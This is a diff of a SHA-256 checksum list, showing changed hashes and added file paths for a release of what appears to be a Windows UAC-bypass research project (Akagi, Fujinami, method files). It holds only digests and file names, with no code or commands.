-db12aa2d259d8147fb5aafc8705f64e147610767c52aee9e391f4e80efc504c8 *Source\Akagi\bin\Hibiki32.cd
-7a7c2ece293096914b672bb1df194bad35b3d2e22796900f4c788856cf7cd9f8 *Source\Akagi\bin\Hibiki64.cd
-f416a307314e57c42b9df0826a59492e3939a75353edd353ce608b401e258d0c *Source\Akagi\bin\Ikazuchi32.cd
-93262fb94835c48c5b3743844b2d51db4bd859eb464c70fe9bf9b91a8642c7b8 *Source\Akagi\bin\Ikazuchi64.cd
-7cad335bc00087bdb652260e22b7ff916e4b4a22b8ed5db8dacbed423be5ecb6 *Source\Akagi\bin\Kamikaze.cd
-3f8bc4c7705420a8b6c5dc5699d16770834ec91792950fec5a65550f66750c2b *Source\Akagi\bin\Kongou32.cd
-4fcced73821e41ebdce34c506bf13a4c11c05e60826cbb53e3b4ace3625bfb2b *Source\Akagi\bin\Kongou64.cd
+7cb684f646a22e3dc803a167f59fe666c249b3c69029660880a1be5735af5bc2 *Source\Akagi\uacme.vcxproj.user
+9c3e2d3e36f1d1c8e60edf6aabef9b881b85e52b00f63bc248736b6be63a618a *Source\Akagi\bin\Akatsuki64.cd
+626c3d4eacd764c9e05ced73b0b424d5c289d163b50a4e4c694d162226007d5e *Source\Akagi\bin\Chiyoda64.cd
+a0d8b7855a6b897be3db3a890d3e9ad1d8b82aafc830f2cfbb39d46da8124614 *Source\Akagi\bin\Fubuki32.cd
+66e932e13d9ad3b1d6f54600398cd075b56235948faa17009fe2ef7a069de917 *Source\Akagi\bin\Fubuki64.cd
+e639c9c5c1232f4cc8196f12d843e72ef757b4a015cc8a08b81319109a597024 *Source\Akagi\bin\Fujinami.cd
+8797ba02ed0e8d31aad62067e2d499a8d40979bc2c7cb3a4fd0bfe2b733a39d5 *Source\Akagi\bin\Hibiki32.cd
+41564e313dc6f001a6c86a3dee57d70e860ecb759fe557d3498243b14d3c184a *Source\Akagi\bin\Hibiki64.cd
+318f9f9efe41427e03d7219648802a50fae77eeac121a2d0e35550725bfe5063 *Source\Akagi\bin\Ikazuchi32.cd
+cf0c711925d07a0791ff6ec107c0ef31da4b6971a47368a256b15fd9ea439e89 *Source\Akagi\bin\Ikazuchi64.cd
+efce39221185db8d7e80a302c2edf948ac950e4ed2cf9991331cc72823c5b9ef *Source\Akagi\bin\Kamikaze.cd
+07b2c0263bbc7c82e7b54af836feb7fea85903e0f4546e463675c69a9e7cb9b8 *Source\Akagi\bin\Kongou32.cd
+770829bf778d8311747f9bc3a480d8e2f592be7062ee59760b266848280bde89 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
124c9bd1140c7df8b41f8592f9b98d3e557bb4f58af51a9285de2eba5ff19027 *Source\Akagi\methods\api0cradle.c
@@ -66,7 +66,7 @@ e38fe4a7e85727336360fdc944e133775734d8fbbc3f7c756aeee63e960f3955 *Source\Akagi\m
b7d0c01c1f07c0d245bde5ac7bdc04992185d7a5ea48df5e8e1e39d14bf21819 *Source\Akagi\methods\hakril.h
4054807a1e4e0f6d7c0d39964e4696841e4ff769db100aa7ac94d6b0ede44716 *Source\Akagi\methods\hybrids.c
320990aaa9c0048df2a287dfa2690d0f2e6b506bd3b419e07ed62e386ba6f9fc *Source\Akagi\methods\hybrids.h
-06f8a87f7b92362145981bdf2ad6610b3f025298dc7d2734520e6a2d06b7a945 *Source\Akagi\methods\methods.c
+7fa614bdbfacef0b951aefe42bf752939536fd5a639dfe626426873feab5d350 *Source\Akagi\methods\methods.c
b2ee22d4e72afffb7f2b5e0c2b02e07a912a1eb44912a193e3b9211ad34e56ee *Source\Akagi\methods\methods.h
14095d4753ea21f3cb5b89bd8bb1955583fbeebc115fc3e9b71dedc9b3bf14a7 *Source\Akagi\methods\pitou.c
cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h
@@ -110,9 +110,12 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
21b205c0c653f47fc92769de3af7a2abba28e3c2eff570ad29e031bd859eb924 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h
-87aab17a851960e5330451613cda681588f13448ca520ddc7462ddebf2b56a00 *Source\Fujinami\EntryPoint.cs
-b53717c272060cae36ae0fb16e0373ce2dd1de8334cb992df5d01b6379413eed *Source\Fujinami\Fujinami.csproj
-13747a263c0f84aadb88ae0689326a6d2720ebe5589f221e867bac85cc01116f *Source\Fujinami\Properties\AssemblyInfo.cs
+647cffcd0a4fc3a32edf6f54508d163a11b78289b6fbba303b2a02bb2cc44035 *Source\Fujinami\EntryPoint.cs
+203b4a6961e7266172a7cd82956c5a5ea2c70501e5199abb29c919b50c03e589 *Source\Fujinami\Fujinami.csproj
+707161f8ba9399bb6d58f22bb4869a0727219eadfa685915c57e8c06e54565d3 *Source\Fujinami\WinNT.cs
+bd7e73bd27e5a6fd78e1e80d2bf353c03f2a1b6a1f38133ed8db540391de025b *Source\Fujinami\Properties\AssemblyInfo.cs
+ece8957f53bb676474f1db6fabe9eefba253f662881d947f4a0756526ce7ebe8 *Source\Fujinami\Properties\Resources.Designer.cs
+86ff051bc89b01c71274c48ac1be4311a2d652209ca51467064c574a57e1bad4 *Source\Fujinami\Properties\Resources.resx
0a5bdcd2377cee27181118c2b036d9ca92f0cb4288b1033ea933b543c005b66c *Source\Fujinami\Properties\Settings.Designer.cs
6fd5dfd9c7171147c5395d52ac220bae0d13efac35e4e7449ebf29dfeedec42b *Source\Fujinami\Properties\Settings.settings
7fcfb7c724da9ec19a625cea4909f59344394d08bcdffab518036d00ad099043 *Source\Hibiki\dllmain.c
@@ -145,7 +148,7 @@ d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\na
e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
-3d024a7163439588778ad34d83afda0b8ad5fe9e05d70208d8dc05a1459ab703 *Source\Shared\consts.h
+f9ee3db5958f38e44755fc2548b8c2cf1133ff3541ca1bd7ca8dfb28b47c7bfd *Source\Shared\consts.h
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
ee22e37e96fff018dd12f38423be8d5f6ca1821b11c70bfc182ffa9da23bdd73 *Source\Shared\libinc.h